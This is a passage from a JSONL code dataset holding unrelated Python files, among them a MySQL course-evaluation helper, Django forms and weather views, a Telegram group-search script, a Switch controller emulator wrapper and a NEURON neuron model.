courseAtmosphere, homeworkQuality,\\\n homeworkFairness, overallQuality, enthusiasm, workload, recommend,\\\n numInvited, numResponded) values (%s, %s, %s, %s, %s, %s, %s, %s, %s,\\\n %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n info_dict = {k: (lambda x: None if x == 'N/A' or x == 'NRP' else x)(v) for k, v in info_dict.items()}\n # clean data in info_dict (since N/A may appear, which can't be recognized by sql.)\n\n department = info_dict['department']\n cID = info_dict['cID']\n cName = info_dict['cName']\n lecNum = info_dict['lecNum']\n campus = info_dict['campus']\n term = info_dict['term']\n instructor = info_dict['instructor']\n instructorFullName = info_dict['instructorFullName']\n intellectuallySimulating = info_dict['intellectuallySimulating']\n deeperUnderstanding = info_dict['deeperUnderstanding']\n courseAtmosphere = info_dict['courseAtmosphere']\n homeworkQuality = info_dict['homeworkQuality']\n homeworkFairness = info_dict['homeworkFairness']\n overallQuality = info_dict['overallQuality']\n enthusiasm = info_dict['enthusiasm']\n workload = info_dict['workload']\n recommend = info_dict['recommend']\n numInvited = info_dict['numInvited']\n numResponded = info_dict['numResponded']\n\n print(cID)\n\n try:\n cursor.execute(sql, (department, cID, cName, lecNum, campus, term,\\\n instructor, instructorFullName, intellectuallySimulating,\\\n deeperUnderstanding, courseAtmosphere, homeworkQuality,\\\n homeworkFairness, overallQuality, enthusiasm, workload, recommend,\\\n numInvited, numResponded))\n except pymysql.err.IntegrityError as e:\n print(\"error due to the crappy data source:\", e.args)\n\ndef commit_data(connection):\n try:\n connection.commit()\n except:\n connection.rollback()\n\n\ndef get_course_data_by_cID_and_campus(cursor, cID, campus):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n campus: a string - either \"St. George\", \"Scarborough\", or \"Mississauga\"\n -------------------------------------------------------\n Returns a list of tuples, with each tuple containing the data of a single\n section of the specified course\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT * FROM Course Where cID like %s And campus = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), campus))\n\n return list(cursor.fetchall())\n\ndef get_instructor_by_cID_and_lecNum(cursor, cID, lecNum):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n lecNum: a string, representing the course section e.g. Lec 5101, Tut 0106\n -------------------------------------------------------\n Returns the instructor of the course given by cID and lecNum\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT instructor FROM Course Where cID like %s And lecNum = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), lecNum))\n\n return cursor.fetchone()[0]\n\n\ndef get_eval_data_by_cID_and_instructor(cursor, cID, instructor):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n instructor: a string e.g. \"S Huynh\", \"T Fairgrieve\"\n -------------------------------------------------------\n Returns a list of tuples, with each tuple containing the evaluation data of a single\n section of the specified course\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT * FROM Eval Where cID like %s And instructor = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), instructor))\n\n return list(cursor.fetchall())\n\n\ndef get_prof_quality_by_instructorFullName(dict_cursor, instructorFullName):\n \"\"\"\n demo:\n > get_prof_quality_by_fullname(cursor, \"David Liu\")\n returns a dictionary\n {'average_course_atmosphere': 4.41, 'average_enthusiasm': 4.47}\n \"\"\"\n\n sql = \"SELECT round(avg(courseAtmosphere), 2) as average_course_atmosphere,\\\n round(avg(enthusiasm), 2) as average_enthusiasm from Eval where instructorFullName = %s\"\n\n dict_cursor.execute(sql, (instructorFullName))\n\n return dict_cursor.fetchone()\n\n\ndef get_avg_prof_quality_by_department(dict_cursor, departmentID):\n \"\"\"\n demo:\n > get_avg_prof_quality_by_department(cursor, \"CSC\")\n returns a dictionary\n {'average_course_atmosphere': 3.9, 'average_enthusiasm': 3.95}\n -------------------------------------------------------------\n Note: departmentID is the first three char at the beginning of cID.\n \"\"\"\n\n sql = \"SELECT round(avg(courseAtmosphere), 2) as average_course_atmosphere,\\\n round(avg(enthusiasm), 2) as average_enthusiasm from Eval where cID like %s\"\n\n dict_cursor.execute(sql, (\"{}%\".format(departmentID)))\n\n return dict_cursor.fetchone()\n\n\ndef get_past_eval_by_instructorFullName_and_cID(dict_cursor, instructorFullName, cID):\n sql = \"SELECT round(avg(intellectuallySimulating), 2) as\\\n avg_intellectually_simulating, round(avg(deeperUnderstanding), 2) as\\\n avg_deeper_understanding, round(avg(homeworkQuality), 2) as\\\n avg_home_quality, round(avg(homeworkFairness), 2) as avg_homework_fairness,\\\n round(avg(overallQuality), 2) as avg_overall_quality, round(avg(recommend),\\\n 2) as avg_recommend_rating, round(avg(numResponded)/avg(numInvited), 2) as\\\n avg_respondent_percentage from Eval where instructorFullName = %s and cID like %s\"\n\n dict_cursor.execute(sql, (instructorFullName, \"{}%\".format(cID)))\n\n result = dict_cursor.fetchone()\n result['avg_respondent_percentage'] = float(result['avg_respondent_percentage'])\n return result\n\n\ndef get_past_eval_by_cID(dict_cursor, cID):\n sql = \"SELECT round(avg(intellectuallySimulating), 2) as\\\n avg_intellectually_simulating, round(avg(deeperUnderstanding), 2) as\\\n avg_deeper_understanding, round(avg(homeworkQuality), 2) as\\\n avg_home_quality, round(avg(homeworkFairness), 2) as avg_homework_fairness,\\\n round(avg(overallQuality), 2) as avg_overall_quality, round(avg(recommend),\\\n 2) as avg_recommend_rating, round(avg(numResponded)/avg(numInvited), 2) as\\\n avg_respondent_percentage from Eval where cID like %s\"\n\n dict_cursor.execute(sql, (\"{}%\".format(cID)))\n\n result = dict_cursor.fetchone()\n result['avg_respondent_percentage'] = float(result['avg_respondent_percentage'])\n return result\n\n\ndef get_past_eval_by_cID_excluding_one_prof(dict_cursor, exclusiveInstructorFullName, cID):\n sql = \"SELECT round(avg(intellectuallySimulating), 2) as\\\n avg_intellectually_simulating, round(avg(deeperUnderstanding), 2) as\\\n avg_deeper_understanding, round(avg(homeworkQuality), 2) as\\\n avg_home_quality, round(avg(homeworkFairness), 2) as avg_homework_fairness,\\\n round(avg(overallQuality), 2) as avg_overall_quality, round(avg(recommend),\\\n 2) as avg_recommend_rating, round(avg(numResponded)/avg(numInvited), 2) as\\\n avg_respondent_percentage from Eval where instructorFullName <> %s and cID like %s\"\n\n dict_cursor.execute(sql, (exclusiveInstructorFullName, \"{}%\".format(cID)))\n\n result = dict_cursor.fetchone()\n result['avg_respondent_percentage'] = float(result['avg_respondent_percentage'])\n return result\n","sub_path":"src/util/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43800822","text":"# https://codility.com/programmers/lessons/4-counting_elements/missing_integer/\n# TC: O(N)\n# SC: O(N)\n# python 2.7.13\n\ndef solution(A):\n N = len(A)\n occur = [False] * (N+1)\n for i in range(0, N):\n if (A[i] > 0) and (A[i] < N+1) and not occur[A[i]]:\n occur[A[i]] = True\n for i in range(1, N+1):\n if not occur[i]:\n return i\n return N+1\n\nif __name__ == '__main__':\n assert solution([1,2,3,4,5]) == 6\n assert solution([1,3,6,4,1,2]) == 5\n","sub_path":"lessons/4.counting-elements/MissingInteger.py","file_name":"MissingInteger.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"29667474","text":"from django import forms\nfrom captcha.fields import CaptchaField\n\nclass fundform(forms.Form):\n\tCOUNTRY = [\n\t\t['國內/境外','國內/境外'],\n\t\t['國內','國內'],\n\t\t['國外','國外'],\n\t]\n\tRISK = [\n\t\t['風險屬性','風險屬性'],\n\t\t['保守型','保守型'],\n\t\t['積極型','積極型'],\n\t\t['穩健型','穩健型'],\n\t\t['成長型','成長型'],\n\t]\n\tCOMPANY = [\n\t\t['計價幣別','計價幣別'],\n\t\t['USD','USD'],\n\t\t['NTD','NTD'],\n\t\t['RMB','RMB'],\n\t]\n\n\tfund_country = forms.ChoiceField(label='國內境外', choices=COUNTRY)\n\tfund_risk = forms.ChoiceField(label='風險屬性', choices=RISK)\n\tfund_company = forms.ChoiceField(label='計價幣別', choices=COMPANY)\n\nclass fundarticle(forms.Form):\n\tArticle = [\n\t\t['最新消息','最新消息'],\n\t\t['境外、股票型','境外、股票型'],\n\t\t['台股、陸股、大中華','台股、陸股、大中華'],\n\t\t['能源、黃金貴金屬','能源、黃金貴金屬'],\n\t\t['REIT、ETF、平衡型','REIT、ETF、平衡型'],\n\t\t['生技農業、特殊資源','生技農業、特殊資源'],\n\t\t['債券、貨幣型','債券、貨幣型'],\n\t\t['綜合分析','綜合分析'],\n\t]\n\t\n\tFundArticle = forms.ChoiceField(label='最新消息', choices=Article)\n\n\nclass captchalogin(forms.Form):\n\tcaptcha = CaptchaField()\n\n","sub_path":"cocsite/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"270939113","text":"import json\nfrom card import card, diction\n\nclass cards(object):\n def __init__(self, json_file='eternal-0.8.json'):\n with open(json_file, 'r') as f:\n parsed_json = f.read()\n self.cards = json.JSONDecoder().decode(parsed_json)\n\n self.sets = {}\n self.sets[\"Set0\"] = {}\n self.sets[\"Set1\"] = {}\n\n for car in self.cards:\n self.sets[car['set']][car['num']] = diction(car)\n\n def __getitem__(self, set_num):\n return self.sets[set_num[0]][set_num[1]]\n","sub_path":"cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211090665","text":"#can, can you do the can can? yes it can! 1/25/11 (TIFF)\r\nfrom Panda import *\r\n\r\ncamera.position = P3(0, -10, .5)\r\nworld.color = black\r\nambientLight(color = gray)\r\ndirectionalLight(color = white, hpr = HPR(2,.5, 0))\r\n\r\nhc1 = control(\"neck\", itimef(at(HPR(0,0,0)) + to(1,HPR(-.28, .6, 0)))) + \\\r\n control(\"leftEyeBrow\", itimef(at(HPR(1, .4, 0)) + to(1, HPR(0, .7,0))))\r\nhc2 = control(\"neck\", itimef(at(HPR(.1,.2,0)) + to(.6,HPR(.4, -.2, .1)))) + \\\r\n control(\"leftEyeBrow\", itimef(at(HPR(1, .2, 0)) + to(.4, HPR(0, .4,0))))\r\nlc1 = control(\"rightHip\", itimef(at(HPR(0,0,0)) + to(1, HPR(0, 1.1,0)))) + \\\r\n control(\"rightKnee\", itimef(at(HPR(0,0,0)) + to(1, HPR(0, -1.1, 0))))\r\nlc2 = control(\"rightHip\", itimef(at(HPR(0,0,0)) + to(.6, HPR(0, 1.1,0)))) + \\\r\n control(\"rightKnee\", itimef(at(HPR(0,0,0)) + to(.6, HPR(0, -.1, 0))))\r\ns1 = sonic(position = P3(0,0,0))\r\ns2 = sonic(position = P3(-1, 0, 0))\r\ns3 = sonic(position = P3(1,0,0))\r\ns4 = sonic(position = P3(2, 0, 0))\r\ns1.control = hc1 + lc1\r\ns2.control = hc1 + lc2\r\ns3.control = hc2 + lc1\r\ns4.control = hc2 + lc2\r\nstart()\r\n","sub_path":"CompletedPandaHandouts/src/Joints/04-joints.py","file_name":"04-joints.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"294293875","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/LogViewMenu.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"Menu for the card set pane\"\"\"\nimport logging, gtk\nfrom .SutekhMenu import SutekhMenu\nfrom .SutekhFileWidget import ExportDialog\n\nclass LogViewMenu(SutekhMenu):\n \"\"\"Log View Menu.\n\n Provides options for filtering the log messages on severity,\n and an options to export the current filtered list to a file.\n \"\"\"\n\n def __init__(self, oFrame, oWindow):\n super(LogViewMenu, self).__init__(oWindow)\n self._oLogFrame = oFrame\n self._create_actions_menu()\n\n def _create_actions_menu(self):\n \"\"\"Create the Actions menu for Card Sets.\"\"\"\n oMenu = self.create_submenu(self, '_Actions')\n oFilterList = self.create_submenu(oMenu, '_Filter log level')\n self._create_filter_list(oFilterList)\n oMenu.add(gtk.SeparatorMenuItem())\n self.create_menu_item('_Save current view to File', oMenu, self._save_to_file)\n\n def _create_filter_list(self, oSubMenu):\n \"\"\"Create list of 'Filter' radio options.\"\"\"\n oAll = gtk.RadioMenuItem(None, 'Show all log messages')\n oInfo = gtk.RadioMenuItem(oAll, 'Ignore debugging log messages')\n oWarn = gtk.RadioMenuItem(oAll, 'Also Ignore Info messages')\n oError = gtk.RadioMenuItem(oAll, 'Only show Error log messages')\n oAll.connect('activate', self._change_log_level, logging.NOTSET)\n oInfo.connect('activate', self._change_log_level, logging.INFO)\n oWarn.connect('activate', self._change_log_level, logging.WARN)\n oError.connect('activate', self._change_log_level, logging.ERROR)\n oAll.set_active(True)\n oSubMenu.add(oAll)\n oSubMenu.add(oInfo)\n oSubMenu.add(oWarn)\n oSubMenu.add(oError)\n return\n\n def _save_to_file(self, _oWidget):\n \"\"\"Popup the Save File dialog.\"\"\"\n oDlg = ExportDialog('Save logs as', self._oMainWindow)\n oDlg.add_filter_with_pattern('TXT files', ['*.txt'])\n oDlg.run()\n self._oLogFrame.view.save_to_file(oDlg.get_name())\n\n def _change_log_level(self, _oWidget, iNewLevel):\n \"\"\"Pass the new log level to the view\"\"\"\n self._oLogFrame.set_filter_level(iNewLevel)","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/LogViewMenu.py","file_name":"LogViewMenu.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"456312504","text":"__author__ = 'Reza'\n\n\ndef find_pattern(pattern, text):\n\n \"\"\"\n Finds all occurrences of 'pattern' in 'text'\n\n :param text:\n :type text: str\n :param pattern:\n :type pattern: str\n :return:\n :rtype: list\n\n Sample Input:\n ATAT\n GATATATGCATATACTTCTAGATGCT\n\n Sample Output:\n [1, 3, 9]\n \"\"\"\n\n k = len(pattern)\n return [i for i in range(len(text) - k + 1) if text[i:i + k] == pattern]\n\nif __name__ == \"__main__\":\n\n input_pattern = input(\"Enter pattern: \").upper()\n input_text = input(\"Enter text: \").upper()\n\n print(\"\\nThe result is:\", \" \".join(map(str, find_pattern(input_pattern, input_text))))","sub_path":"_103_PatternMatching.py","file_name":"_103_PatternMatching.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"129311356","text":"import socket\n\"\"\"https://stackoverflow.com/questions/20913411/test-if-an-internet-connection-is-present-in-python\"\"\"\ndef check_connection(website): #should be a string (ex.\"www.google.com\")\n port = 80\n try:\n socket.create_connection((website, port))\n return True\n except OSError:\n print(\"You can't connect to that website\")\n return False","sub_path":"João/checkconnection.py","file_name":"checkconnection.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"136081001","text":"\r\nimport PySimpleGUI as sg\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon.tl.functions.messages import GetDialogsRequest\r\nfrom telethon.tl.types import InputPeerEmpty,InputPeerChannel,InputPeerUser\r\nimport sys,os\r\nfrom telethon.tl.functions.channels import InviteToChannelRequest\r\nfrom telethon import functions, types\r\n\r\n\r\nimport random\r\nimport time\r\nimport subprocess\r\nfrom pickle import dumps, load\r\nimport asyncio\r\n\r\n\r\n\r\n\r\nasync def doSearch(client, word):\r\n res = []\r\n res = await client(functions.contacts.SearchRequest(q=word,limit=100))\r\n return res\r\n\r\n\r\n\r\n\r\nclass feeder:\r\n def __init__(self, groupFrom, groupTo):\r\n self.groupFrom = groupFrom\r\n self.groupTo = groupTo\r\n\r\n\r\n\r\n############## DECLARATION ####################\r\nmegaGroups=[]\r\ngroups=['486469468','469496846']\r\ntoSearch = \"\"\r\nnewToSearch = \"\"\r\nresult=[]\r\nresultChats=[]\r\nvoyelles= ['a','e','i','o','u']\r\nconsonnes=['b','c','d','f','g','h','j','k','l','m','n','p','q','r','s','t','v','w','x','y','z']\r\n\r\n\r\napi_id = Your_API_Id\r\napi_hash = 'Your_API_HASH'\r\nphone = 'YOUR_PHONE_NUMBER'\r\nclient = TelegramClient(phone, api_id, api_hash)\r\nclient.connect()\r\n\r\n\r\n\r\n\r\n################# Main window #######################\r\nconnection_column = [\r\n [sg.Button(\"Search\")]\r\n\r\n]\r\n\r\n\r\nlist_group=[\r\n [sg.InputText(key=\"-Word-\")],\r\n [sg.Listbox(values=[], enable_events=True,size=(50,20),key=\"-SearchResult-\", no_scrollbar= False)]\r\n]\r\n\r\n\r\n\r\nlayout =[\r\n [\r\n sg.Column(connection_column),\r\n sg.Column(list_group)\r\n ]\r\n]\r\n\r\n\r\nwindow = sg.Window(\"titre\", layout)\r\n\r\n\r\nif not client.is_user_authorized():\r\n\t\tclient.send_code_request(phone)\r\n\t\tclient.sign_in(phone, input('Enter the code: '))\r\n\r\n\r\n\r\n\r\nasync def main():\r\n# LOOP\r\n while True:\r\n event, values = window.read()\r\n\r\n if event==\"Search\":\r\n toSearch = values[\"-Word-\"]\r\n print(toSearch)\r\n\r\n result = await doSearch(client,toSearch)\r\n for r in result.chats:\r\n resultChats.append(r)\r\n\r\n ########################## voyelles avant\r\n for v in voyelles:\r\n newToSearch = toSearch + v\r\n print(\"new to search\" + toSearch)\r\n result=await doSearch(client,newToSearch)\r\n print(\"nouveau résultats : \" + str(len(result.chats)))\r\n\r\n for r in result.chats:\r\n resultChats.append(r)\r\n\r\n ########################## consonne après\r\n for c in consonnes:\r\n newToSearch = toSearch + c\r\n print(\"new to search\" + toSearch)\r\n result=await doSearch(client,newToSearch)\r\n print(\"nouveau résultats : \" + str(len(result.chats)))\r\n\r\n for r in result.chats:\r\n resultChats.append(r)\r\n\r\n titlesToDisplay = []\r\n for r in resultChats:\r\n titlesToDisplay.append(r.title)\r\n\r\n window.Element('-SearchResult-').Update(values=titlesToDisplay)\r\n\r\n\r\n #fermeture fenetre\r\n if event == sg.WIN_CLOSED:\r\n break;\r\n\r\n await client.disconnect()\r\n window.close()\r\n\r\nwith client:\r\n client.loop.run_until_complete(main())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"TeleSearch.py","file_name":"TeleSearch.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"69207570","text":"import asyncio\nimport logging\n\nfrom joycontrol.controller import Controller\nfrom joycontrol.controller_state import ControllerState, button_push\nfrom joycontrol.memory import FlashMemory\nfrom joycontrol.protocol import controller_protocol_factory\nfrom joycontrol.server import create_hid_server\n\nlogger = logging.getLogger(__name__)\n\n\nclass SwitchController():\n\tdef __init__(self, controller_state: ControllerState):\n\t\tself._controller_state = controller_state\n\t\tprint(\"L CALIBRATION:\")\n\t\tprint(controller_state.l_stick_state.get_calibration())\n\n\t@staticmethod\n\tasync def get_controller(reconnect_bt_addr=None, spi_flash=None, controller='PRO_CONTROLLER', capture_file=None,\n\t\t\t\t\t\t\t device_id=None):\n\t\t# parse the spi flash\n\t\tif spi_flash:\n\t\t\twith open(spi_flash, 'rb') as spi_flash_file:\n\t\t\t\tspi_flash = FlashMemory(spi_flash_file.read())\n\t\telse:\n\t\t\t# Create memory containing default controller stick calibration\n\t\t\tspi_flash = FlashMemory()\n\n\t\t# Get controller name to emulate from arguments\n\t\tcontroller = Controller.from_arg(controller)\n\t\tfactory = controller_protocol_factory(controller, spi_flash=spi_flash)\n\t\tctl_psm, itr_psm = 17, 19\n\t\ttransport, protocol = await create_hid_server(factory, reconnect_bt_addr=reconnect_bt_addr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t ctl_psm=ctl_psm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t itr_psm=itr_psm, capture_file=capture_file,\n\t\t\t\t\t\t\t\t\t\t\t\t\t device_id=device_id)\n\n\t\tcontroller_state: ControllerState = protocol.get_controller_state()\n\n\t\treturn SwitchController(controller_state)\n\n\t@staticmethod\n\tdef _set_stick(stick, direction, value):\n\t\tif direction == 'center':\n\t\t\tstick.set_center()\n\t\telif direction == 'up':\n\t\t\tstick.set_up()\n\t\telif direction == 'down':\n\t\t\tstick.set_down()\n\t\telif direction == 'left':\n\t\t\tstick.set_left()\n\t\telif direction == 'right':\n\t\t\tstick.set_right()\n\t\telif direction in ('h', 'horizontal'):\n\t\t\tif value is None:\n\t\t\t\traise ValueError(f'Missing value')\n\t\t\tif value == 'max':\n\t\t\t\tval = stick.get_calibration().h_center + stick.get_calibration().h_max_above_center\n\t\t\telif value == 'min':\n\t\t\t\tval = stick.get_calibration().h_center - stick.get_calibration().h_max_below_center\n\t\t\telif value == 'center':\n\t\t\t\tval = stick.get_calibration().h_center\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\t# TODO Convert -1 to +1 to the calibrated values.\n\t\t\t\t\tval = int(value)\n\t\t\t\texcept ValueError:\n\t\t\t\t\traise ValueError(f'Unexpected stick value \"{value}\"')\n\t\t\tstick.set_h(val)\n\t\telif direction in ('v', 'vertical'):\n\t\t\tif value is None:\n\t\t\t\traise ValueError(f'Missing value')\n\t\t\tif value == 'max':\n\t\t\t\tval = stick.get_calibration().v_center + stick.get_calibration().v_max_above_center\n\t\t\telif value == 'min':\n\t\t\t\tval = stick.get_calibration().v_center - stick.get_calibration().v_max_below_center\n\t\t\telif value == 'center':\n\t\t\t\tval = stick.get_calibration().v_center\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tval = int(value)\n\t\t\t\t\t# TODO Convert -1 to +1 to the calibrated values.\n\t\t\t\texcept ValueError:\n\t\t\t\t\traise ValueError(f'Unexpected stick value \"{value}\"')\n\t\t\tstick.set_v(val)\n\t\telse:\n\t\t\traise ValueError(f'Unexpected argument \"{direction}\"')\n\n\t\treturn f'{stick.__class__.__name__} was set to ({stick.get_h()}, {stick.get_v()}).'\n\n\tdef run(self, command: str):\n\t\tlogger.debug(command)\n\t\tif command in 'lrabxy':\n\t\t\tasyncio.ensure_future(button_push(self._controller_state, command))\n\t\telif command.startswith('s'):\n\t\t\tcommand = command.split(' ')\n\t\t\t# TODO Support 's hv '\n\t\t\tassert len(command) >= 3\n\t\t\tif command[1] == 'l':\n\t\t\t\tstick = self._controller_state.l_stick_state\n\t\t\telse:\n\t\t\t\tstick = self._controller_state.r_stick_state\n\t\t\tdirection = command[2]\n\t\t\tif len(command) > 3:\n\t\t\t\tvalue = command[3]\n\t\t\telse:\n\t\t\t\tvalue = None\n\t\t\ts = SwitchController._set_stick(stick, direction, value)\n\t\t\tlogger.debug(s)\n\t\t\tasyncio.ensure_future(self._controller_state.send())\n\t\telse:\n\t\t\tcommand = command.split(' ')\n\t\t\tassert len(command) >= 2\n\t\t\tbutton = command[0]\n\t\t\tpushed = command[1] == 'd'\n\t\t\tself._controller_state.button_state.set_button(button, pushed)\n\t\t\t# Not sure if sending the state is needed but other methods use it.\n\t\t\tasyncio.ensure_future(self._controller_state.send())\n","sub_path":"server/switchremoteplay/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"306918146","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import SignUpForm\nimport requests\nimport json\n\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef forecast(request):\n # fetch data from api\n url = 'http://weather.news24.com/ajaxpro/Weather.Code.Ajax,Weather.ashx'\n payload = {'cityId': '77107'}\n # payload = {'cityId': '77031'} # bloemfontein\n headers = {'X-AjaxPro-Method': 'GetForecast7Day'}\n res = requests.post(url, data=json.dumps(payload), headers=headers)\n data = res.json()\n city = data['value']\n forecasts_list = data['value']['Forecasts']\n\n # pagination\n page = request.GET.get('page', 1)\n paginator = Paginator(forecasts_list, 3)\n try:\n forecasts = paginator.page(page)\n except PageNotAnInteger:\n forecasts = paginator.page(1)\n except EmptyPage:\n forecasts = paginator.page(paginator.num_pages)\n\n return render(request, 'forecast.html', {\n 'city': city,\n 'forecasts': forecasts\n })\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db() # load the profile instance created by the signal\n user.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect('home')\n else:\n form = UserCreationForm()\n return render(request, 'signup.html', {'form': form})\n","sub_path":"src/weather_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"28066611","text":"\nclass Car:\n\t\"\"\"docstring for Car\"\"\"\n\tdef __init__(self, wheel_angle = 0, speed = 0):\n\t\tself.wheel_angle = wheel_angle\n\t\tself.speed = speed\n\t\tself.engineStatus = False\n\t\tself.seconds = 0\n\tdef loop(self):\n\t\twhile self.seconds < 200:\n\t\t\tself.seconds += 1\n\t\t\tself.speed -= 1\n\t\t\tself.wheel_angle = -1\n\t\t\tprint(\"speed = {}\".format(self.speed))\n\t\t\tprint(\"wheel_angle = {}\".format(self.wheel_angle))\n\tdef startEngine(self, time):\n\t\tif self.engineStatus == False:\n\t\t\tprint(\"WRRRR (on {}sec)\".format(time))\n\t\telse:\n\t\t\tprint(\"\")\n\tdef stopEngine(self, time):\n\t\tif self.engineStatus == False:\n\t\t\tprint(\"\".format(time))\n\t\telse:\n\t\t\tprint(\"UUUuum (on {}sec)\".format(time))\n\tdef obsticleHandler(self, time):\n\t\tpass\n\tdef act(self, event):\n\t\ttime = event[1]\n\t\tevent = event[0]\n\t\tif event == 'stat the engine' :\n\t\t\tself.startEngine(time)\n\t\telif event == 'stop the engine' :\n\t\t\tself.stopEngine(time)\n\t\telif event == 'obsticle' :\n\t\t\tself.obsticleHandler(time)\n\n\ncar1 = Car()\ncar1.act(('stat the engine', 10))\ncar1.act(('stop the engine', 10))","sub_path":"Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"380795096","text":"# vim: set filetype=python tabstop=4 shiftwidth=4 expandtab:\n\nimport collections\n\nfrom chat import handle_err, handle_signal, handle_start\nfrom git import handle_pull\n\nHandler = collections.namedtuple(\"Handler\", [\"method\", \"defer\"])\n\nEND = 0\nERR = 1\nSTART = 2\nPULL = 3\nSIGNAL = 128\n\n_handlers = {\n ERR: Handler(handle_err, True),\n START: Handler(handle_start, True),\n PULL: Handler(handle_pull, False),\n SIGNAL: Handler(handle_signal, True)\n}\n\n\ndef extract_status(exit_code):\n if not exit_code:\n return END, None\n\n high = exit_code >> 8\n\n if high:\n return high, _handlers[high]\n else:\n return SIGNAL, Handler(lambda: _handlers[SIGNAL].method(exit_code), True)\n","sub_path":"src/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271792318","text":"' Author: Darian Hadjiabadi '\n\nimport numpy as np\nfrom neuron import h, gui\n\nclass OLMCell(object):\n\n def __init__(self):\n self.prelist = []\n self.all = None\n self.soma = None\n self.dend1 = None\n self.dend2 = None\n self.axon = None\n\n self.init()\n\n def init(self):\n self.topol()\n self.subsets()\n self.geom()\n self.biophys()\n self.geom_nseg()\n self.synapses()\n\n def topol(self):\n self.soma = h.Section(name='soma', cell=self)\n self.dend1 = h.Section(name='dend1', cell=self)\n self.dend2 = h.Section(name='dend2', cell=self)\n self.axon = h.Section(name='axon', cell=self)\n\n self.dend1.connect(self.soma(1))\n self.dend2.connect(self.soma(0))\n self.axon.connect(self.soma(0))\n \n self.basic_shape()\n\n def basic_shape(self):\n h.pt3dclear(sec=self.soma)\n h.pt3dadd(0, 0, 0, 1, sec=self.soma)\n h.pt3dadd(15, 0, 0, 1, sec=self.soma)\n\n h.pt3dclear(sec=self.dend1)\n h.pt3dadd(15, 0, 0, 1, sec=self.dend1)\n h.pt3dadd(90, 0, 0, 1, sec=self.dend1)\n \n h.pt3dclear(sec=self.dend2)\n h.pt3dadd(0, 0, 0, 1, sec=self.dend2)\n h.pt3dadd(-74, 0, 0, 1, sec=self.dend2)\n \n h.pt3dclear(sec=self.axon)\n h.pt3dadd(15, 0, 0, 1, sec=self.axon)\n h.pt3dadd(15, 120, 0, 1, sec=self.axon)\n\n def subsets(self):\n self.all = h.SectionList()\n self.all.wholetree(sec=self.soma)\n\n def geom(self):\n self.soma.L = 20\n self.soma.diam = 10\n \n self.dend1.L = 250\n self.dend1.diam = 3\n\n self.dend2.L = 250\n self.dend2.diam = 3\n\n self.axon.L = 150\n self.axon.diam = 1.5\n\n def biophys(self):\n\n Rm = 20000\n\n for sec in self.all:\n sec.Ra = 150\n sec.cm = 1.3\n\n self.soma.insert('IA')\n for seg in 